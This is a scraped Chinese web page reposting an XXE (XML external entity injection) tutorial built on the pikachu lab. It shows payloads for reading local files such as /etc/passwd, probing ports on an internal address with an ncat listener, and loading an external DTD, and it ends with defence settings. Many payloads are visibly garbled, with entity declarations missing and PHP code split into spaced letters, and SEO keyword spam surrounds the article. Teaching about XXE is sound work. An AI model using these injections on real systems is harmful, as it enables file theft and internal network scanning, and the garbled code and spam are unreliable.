当前位置: 首页 > news >正文

南通模板建站多少钱百度网站app

南通模板建站多少钱,百度网站app,烟台装修公司网站建设,wordpress 主题制作 导航条文章目录 一、漏洞原理二、验证payload三、没有回显时的验证四、漏洞特征五、读取文件六、Base64加密读取七、端口检测八、使用php检测端口九、dtd外部实体读取文件十、Xxe漏洞防御 一、漏洞原理 (1)XXE漏洞全称XML External Entity Injection,即xmI外部实体注入漏…

文章目录

  • 一、漏洞原理
  • 二、验证payload
  • 三、没有回显时的验证
  • 四、漏洞特征
  • 五、读取文件
  • 六、Base64加密读取
  • 七、端口检测
  • 八、使用php检测端口
  • 九、dtd外部实体读取文件
  • 十、Xxe漏洞防御

一、漏洞原理

(1)XXE漏洞全称XML External Entity Injection,即xmI外部实体注入漏洞, XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害,XML(也是一种语言)被设计用来传输和存储数据
(2)也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致漏洞
实验环境:windows pikachu xxe漏洞

二、验证payload

<?xml version = "1.0"?>

]>
&hacker;
在这里插入图片描述

三、没有回显时的验证

<?xml version = "1.0"?>

]>
&xxe;
在这里插入图片描述

四、漏洞特征

Accept里有application/xml的格式
在这里插入图片描述

五、读取文件

<?xml version = "1.0"?> ]> &f;

在这里插入图片描述

六、Base64加密读取

<?xml version = "1.0"?> ]> &f;

在这里插入图片描述
在这里插入图片描述

或则读取linux的/etc/passwd

<?xml version = "1.0"?> ]> &f;

七、端口检测

ncat -lvp 4000(端口可自定义)
使用以下语句尝试是否能够建立连接

<?xml version = "1.0"?> <!ENTITY xxe SYSTEM "http://192.168.198.2:4000/">

]>&xxe;
如果能够建立连接,那么服务器端的ncat会收到相应的请求信息。
在这里插入图片描述

八、使用php检测端口

<?php $xml=<<

]>
&xxe;
EOF;
d a t a = s i m p l e x m l l o a d s t r i n g ( data=simplexml_load_string( data=simplexmlloadstring(xml);
print_r($data);
?>
端口关闭的情况如下
在这里插入图片描述

开启时
在这里插入图片描述

九、dtd外部实体读取文件

<?xml version="1.0"?><!DOCTYPE note

[<!ENTITY % d SYSTEM "http://127.0.0.1/note.dtd">%d;]>
&eviltest;

在这里插入图片描述

十、Xxe漏洞防御

1、使用开发语言提供的禁用外部实体的方法
1.PHP:
libxml_disable_entity_loader(true);
2.JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
3.Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

http://www.tj-hxxt.cn/news/79890.html

相关文章:

  • 提供小企业网站建设seo优化有哪些
  • 广东省建设工程交易中心seo优化技术培训中心
  • 凡科互动网站登录入口软文推广做的比较好的推广平台
  • 成都便宜做网站的怀来网站seo
  • 移动网站建设学习网站流量统计软件
  • 无锡怎么做网站推广免费获客软件
  • 做准的算命网站seo工具大全
  • 58同城类似的网站怎么做网络营销课程培训课程
  • 海南做房地产网站的网络公司太原关键词优化报价
  • 临沂网站设计seo蜘蛛池
  • 自助游网站开发分析报告外链网盘
  • 怎样申请网站空间品牌策划方案模板
  • 已有网站开发app全网营销推广案例
  • 做网站服务器用谁的建网站流程
  • 上海市建设和城乡建设委员会网站专门搜索知乎内容的搜索引擎
  • 做公关用的网站中国站长工具
  • 武汉网页建站如何推销产品给客户
  • wordpress 只能做博客电池优化大师下载
  • 高端网站案例欣赏好看的网站模板
  • 网站建设捌金手指花总三十seo网站优化排名
  • wordpress cubic台州seo排名外包
  • 国内做网站比较好的公司电影站的seo
  • 手机网站跳转怎么做宁波百度seo点击软件
  • 网站建设合同管辖地阿里指数查询手机版
  • 地方网站怎么做推广成都黑帽seo
  • 手机网站制作招聘seo是什么
  • 做网站app需要懂些什么seo的培训课程
  • 网站做链接需要优化的地方
  • 做网站的公司天津柳州网站建设哪里有
  • 苏州新区城乡建设网站苏州企业网站关键词优化